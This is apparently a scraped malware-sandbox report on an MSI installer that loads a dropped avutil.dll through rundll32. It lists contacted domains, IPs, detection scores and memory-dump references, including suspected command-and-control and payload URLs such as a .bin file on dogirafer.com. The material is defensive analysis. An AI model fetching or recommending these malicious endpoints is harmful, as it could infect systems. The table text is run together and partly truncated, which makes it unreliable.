44->59         started        61 net1.exe 49->61         started        63 net1.exe 51->63         started        process17

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            fes.msi0%ReversingLabs
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\avutil.dll0%ReversingLabs
            C:\Windows\Installer\MSI15E9.tmp0%ReversingLabs
            C:\Windows\Installer\MSI1658.tmp0%ReversingLabs
            C:\Windows\Installer\MSI1688.tmp0%ReversingLabs
            C:\Windows\Installer\MSI16A8.tmp0%ReversingLabs
            C:\Windows\Installer\MSI17D3.tmp0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://dogirafer.com/CD0%Avira URL Cloudsafe
            https://dogirafer.com/test/ser-l1-1-00%Avira URL Cloudsafe
            https://dogirafer.com/F0%Avira URL Cloudsafe
            https://reateberam.com/test/5351441_21349625930948_9623822URLS1https://dogirafer.com/test/8025589_88100%Avira URL Cloudmalware
            https://vutarf.com/0%Avira URL Cloudsafe
            https://reateberam.com/test/3155509_577958930160_4374071URLS1https://dogirafer.com/test/2006230_2943100%Avira URL Cloudmalware
            https://vutarf.com:6542/stop.phpE0%Avira URL Cloudsafe
            https://dogirafer.com/test/KB0%Avira URL Cloudsafe
            https://dogirafer.com/6122658-3693405117-2476756634-10020%Avira URL Cloudsafe
            https://reateberam.com/test/100%Avira URL Cloudmalware
            https://vutarf.com:6542/stop.php0%Avira URL Cloudsafe
            https://huanvn.com:6542/gop.php0%Avira URL Cloudsafe
            https://huanvn.com:6542/gop.phpw0%Avira URL Cloudsafe
            https://dogirafer.com/test/36P0%Avira URL Cloudsafe
            https://dogirafer.com/30%Avira URL Cloudsafe
            https://dogirafer.com/6122658-3693405117-2476756634-1002q0%Avira URL Cloudsafe
            https://reateberam.com/test/9001616_28662416912457_9237360URLS1https://dogirafer.com/test/5693052_67100%Avira URL Cloudmalware
            https://huanvn.com:6542/gop.phpf0%Avira URL Cloudsafe
            https://dogirafer.com/test/l6m0%Avira URL Cloudsafe
            https://dogirafer.com/test/_D0%Avira URL Cloudsafe
            https://reateberam.com/test/W100%Avira URL Cloudmalware
            https://huanvn.com/0%Avira URL Cloudsafe
            https://huanvn.com/30%Avira URL Cloudsafe
            https://vutarf.com:6542/stop.phpXw0%Avira URL Cloudsafe
            https://vutarf.com:6542/stop.php:N0%Avira URL Cloudsafe
            https://reateberam.com/100%Avira URL Cloudmalware
            https://dogirafer.com/test/0%Avira URL Cloudsafe
            https://dogirafer.com/0%Avira URL Cloudsafe
            https://vutarf.com/s0%Avira URL Cloudsafe
            https://dogirafer.com/test/%0%Avira URL Cloudsafe
            https://dogirafer.com/test/56J0%Avira URL Cloudsafe
            https://reateberam.com/test/5285504_70103146102045_6870568URLS1https://dogirafer.com/test/7527773_96100%Avira URL Cloudmalware
            https://reateberam.com/test/G100%Avira URL Cloudmalware
            https://dogirafer.com/files/stkm.bin0%Avira URL Cloudsafe
            https://dogirafer.com/test/H0%Avira URL Cloudsafe
            https://dogirafer.com/test/00%Avira URL Cloudsafe
            https://vutarf.com/Z0%Avira URL Cloudsafe
            https://dogirafer.com/3p0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            bg.microsoft.map.fastly.net
            199.232.210.172
            truefalse
              high
              vutarf.com
              94.232.43.224
              truetrue
                unknown
                huanvn.com
                103.57.249.207
                truetrue
                  unknown
                  dogirafer.com
                  104.21.68.89
                  truetrue
                    unknown
                    reateberam.com
                    unknown
                    unknowntrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      https://reateberam.com/test/true
                      • Avira URL Cloud: malware
                      unknown
                      https://dogirafer.com/test/true
                      • Avira URL Cloud: safe
                      unknown
                      https://dogirafer.com/files/stkm.bintrue
                      • Avira URL Cloud: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://aka.ms/odirmrexplorer.exe, 00000009.00000002.4143464537.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                        high
                        https://dogirafer.com/Fexplorer.exe, 00000009.00000002.4154916178.000000000C964000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                          high
                          https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4147116004.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1925954013.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                            high
                            https://dogirafer.com/test/KBexplorer.exe, 00000009.00000002.4154916178.000000000C964000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://excel.office.comexplorer.exe, 00000009.00000002.4154916178.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1934799200.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                              high
                              https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                high
                                https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                  high
                                  https://vutarf.com/rundll32.exe, 00000005.00000002.4141047160.000001E5177D7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823437020.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E5177BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                    high
                                    https://streams.videolan.org/upload/rundll32.exe, 00000005.00000002.4144009305.00007FFDF91DD000.00000002.00000001.01000000.00000005.sdmp, avutil.dll.1.drfalse
                                      high
                                      https://dogirafer.com/6122658-3693405117-2476756634-1002explorer.exe, 00000009.00000003.3105393162.000000000CB33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3106653549.000000000CB3D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3106528073.000000000CB33000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000009.00000000.1922418491.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4143464537.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                        high
                                        https://dogirafer.com/CDexplorer.exe, 00000009.00000002.4154916178.000000000C964000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000009.00000000.1934799200.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
                                          high
                                          https://dogirafer.com/test/ser-l1-1-0explorer.exe, 00000009.00000002.4148263882.0000000009A10000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://reateberam.com/test/5351441_21349625930948_9623822URLS1https://dogirafer.com/test/8025589_88explorer.exe, 00000009.00000003.3181105020.00000000087C0000.00000040.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://vutarf.com:6542/stop.phpErundll32.exe, 00000005.00000002.4141047160.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823437020.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E5177BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                            high
                                            https://reateberam.com/test/3155509_577958930160_4374071URLS1https://dogirafer.com/test/2006230_2943explorer.exe, 00000009.00000003.2903762845.0000000008750000.00000040.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            unknown
                                            https://wns.windows.com/Lexplorer.exe, 00000009.00000002.4154916178.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1934799200.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                                              high
                                              https://word.office.comexplorer.exe, 00000009.00000002.4154916178.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1934799200.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                high
                                                https://huanvn.com:6542/gop.phprundll32.exe, 00000005.00000002.4140824135.000001E517784000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  high
                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000009.00000000.1922418491.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4143464537.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    high
                                                    https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      high
                                                      http://r10.o.lencr.org0#rundll32.exe, 00000005.00000002.4140824135.000001E51772B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4141047160.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823437020.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E5177BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://vutarf.com:6542/stop.phprundll32.exe, 00000005.00000002.4140824135.000001E51772B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4141047160.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823437020.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E5177BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          high
                                                          http://schemas.micrexplorer.exe, 00000009.00000000.1929051492.00000000098A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              high
                                                              http://r11.i.lencr.org/0rundll32.exe, 00000005.00000003.1919140281.000001E5177E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4140824135.000001E51772B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4141123576.000001E5177EC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823307275.000001E5177EC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823468675.000001E5177EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://dogirafer.com/test/36Pexplorer.exe, 00000009.00000002.4156669266.000000000CAE3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://huanvn.com:6542/gop.phpwrundll32.exe, 00000005.00000002.4140824135.000001E517784000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://android.notify.windows.com/iOSexplorer.exe, 00000009.00000000.1934799200.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://dogirafer.com/3explorer.exe, 00000009.00000003.3064403345.000000000CB33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://www.advancedinstaller.comfes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.drfalse
                                                                          high
                                                                          https://dogirafer.com/6122658-3693405117-2476756634-1002qexplorer.exe, 00000009.00000002.4156669266.000000000CAE3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://huanvn.com:6542/gop.phpfrundll32.exe, 00000005.00000002.4140824135.000001E517784000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000009.00000000.1922418491.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4143464537.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://reateberam.com/test/9001616_28662416912457_9237360URLS1https://dogirafer.com/test/5693052_67explorer.exe, 00000009.00000003.3092452883.0000000009070000.00000040.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: malware
                                                                            unknown
                                                                            https://outlook.com_explorer.exe, 00000009.00000002.4154916178.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1934799200.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://dogirafer.com/test/_Dexplorer.exe, 00000009.00000002.4154916178.000000000C964000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://r10.i.lencr.org/0rundll32.exe, 00000005.00000002.4140824135.000001E51772B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4141047160.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823437020.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E5177BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://dogirafer.com/test/l6mexplorer.exe, 00000009.00000003.3064403345.000000000CAE3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://schemas.miexplorer.exe, 00000009.00000000.1929051492.00000000098A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000009.00000002.4143464537.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://powerpoint.office.comcemberexplorer.exe, 00000009.00000002.4154916178.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1934799200.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://huanvn.com/rundll32.exe, 00000005.00000002.4140824135.000001E517790000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E51778E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://huanvn.com/3rundll32.exe, 00000005.00000002.4140824135.000001E517790000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E51778E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://schemas.microexplorer.exe, 00000009.00000000.1924820436.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.1932111599.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.1923210820.0000000007F40000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://reateberam.com/test/Wexplorer.exe, 00000009.00000002.4156669266.000000000CAE3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3105655586.000000000CAE3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3064403345.000000000CAE3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: malware
                                                                                              unknown
                                                                                              https://vutarf.com:6542/stop.phpXwrundll32.exe, 00000005.00000002.4140824135.000001E51772B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://vutarf.com:6542/stop.php:Nrundll32.exe, 00000005.00000002.4140824135.000001E51772B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://reateberam.com/explorer.exe, 00000009.00000002.4154916178.000000000C964000.00000004.00000001.00020000.00000000.sdmptrue
                                                                                              • Avira URL Cloud: malware
                                                                                              unknown
                                                                                              https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://x1.c.lencr.org/0rundll32.exe, 00000005.00000003.1919140281.000001E5177E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4140824135.000001E51772B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4141123576.000001E5177EC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823307275.000001E5177EC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4141047160.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823468675.000001E5177EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823437020.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E5177BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://x1.i.lencr.org/0rundll32.exe, 00000005.00000003.1919140281.000001E5177E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4140824135.000001E51772B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4141123576.000001E5177EC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823307275.000001E5177EC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4141047160.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823468675.000001E5177EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823437020.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E5177BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://api.msn.com/qexplorer.exe, 00000009.00000002.4147116004.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1925954013.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://dogirafer.com/explorer.exe, 00000009.00000003.3106528073.000000000CB33000.00000004.00000001.00020000.00000000.sdmptrue
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000009.00000000.1922418491.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4143464537.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://vutarf.com/srundll32.exe, 00000005.00000002.4141047160.000001E5177D7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823437020.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E5177BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  http://r11.o.lencr.org0#rundll32.exe, 00000005.00000003.1919140281.000001E5177E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4140824135.000001E51772B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4141123576.000001E5177EC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823307275.000001E5177EC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823468675.000001E5177EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://dogirafer.com/test/%explorer.exe, 00000009.00000002.4154916178.000000000C54A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://aka.ms/Vh5j3kexplorer.exe, 00000009.00000002.4143464537.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://api.msn.com/v1/news/Feed/Windows?&explorer.exe, 00000009.00000002.4147116004.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1925954013.00000000096DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svgexplorer.exe, 00000009.00000002.4143464537.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1922418491.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://dogirafer.com/test/56Jexplorer.exe, 00000009.00000002.4156669266.000000000CAE3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://reateberam.com/test/5285504_70103146102045_6870568URLS1https://dogirafer.com/test/7527773_96explorer.exe, 00000009.00000003.3152054536.0000000009080000.00000040.00000001.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: malware
                                                                                                                            unknown
                                                                                                                            https://www.thawte.com/cps0/fes.msi, MSI15E9.tmp.1.dr, MSI1688.tmp.1.dr, MSI16F7.tmp.1.dr, MSI17D3.tmp.1.dr, 45150f.msi.1.dr, MSI16A8.tmp.1.dr, MSI1658.tmp.1.drfalse
                                                                                                                              high
                                                                                                                              https://reateberam.com/test/Gexplorer.exe, 00000009.00000002.4156669266.000000000CAE3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3105655586.000000000CAE3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3064403345.000000000CAE3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: malware
                                                                                                                              unknown
                                                                                                                              https://dogirafer.com/test/Hexplorer.exe, 00000009.00000003.3468352135.000000000C9D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://vutarf.com/Zrundll32.exe, 00000005.00000002.4141047160.000001E5177D7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2823437020.000001E5177BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1919232883.000001E5177BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
